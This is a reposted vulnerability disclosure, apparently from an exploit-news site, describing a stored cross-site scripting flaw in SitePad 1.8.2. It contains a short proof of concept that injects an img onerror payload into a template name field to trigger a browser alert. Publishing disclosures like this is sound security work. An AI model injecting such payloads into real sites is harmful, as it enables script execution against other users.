Home Tools Exploits & CVE's SitePad 1.8.2 Cross Site Scripting

SitePad 1.8.2 Cross Site Scripting

February 26, 2024

170

Authored by tmrswrr

SitePad version 1.8.2 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SitePad Version : 1.8.2 - Stored XSS 
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://sitepad.com/
# Version : 1.8.2
# Tested on: https://www.softaculous.com/apps/blogs/SitePad


1 ) Go to Templates > Header > Edit Pagelayer Template
2 ) Write in Name : "><img src=x onerrora=confirm() onerror=confirm(1)>
3) After save and refresh page will be see alert button https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9

SitePad 1.8.2 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Gambio Online Webshop 4.9.2.0 Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

XNU Kernel Turnstiles Type Confusion

Backdoor.Win32.Psychward.ds Weak Hardcoded Password

etcd-browser 87ae63d75260 Directory Traversal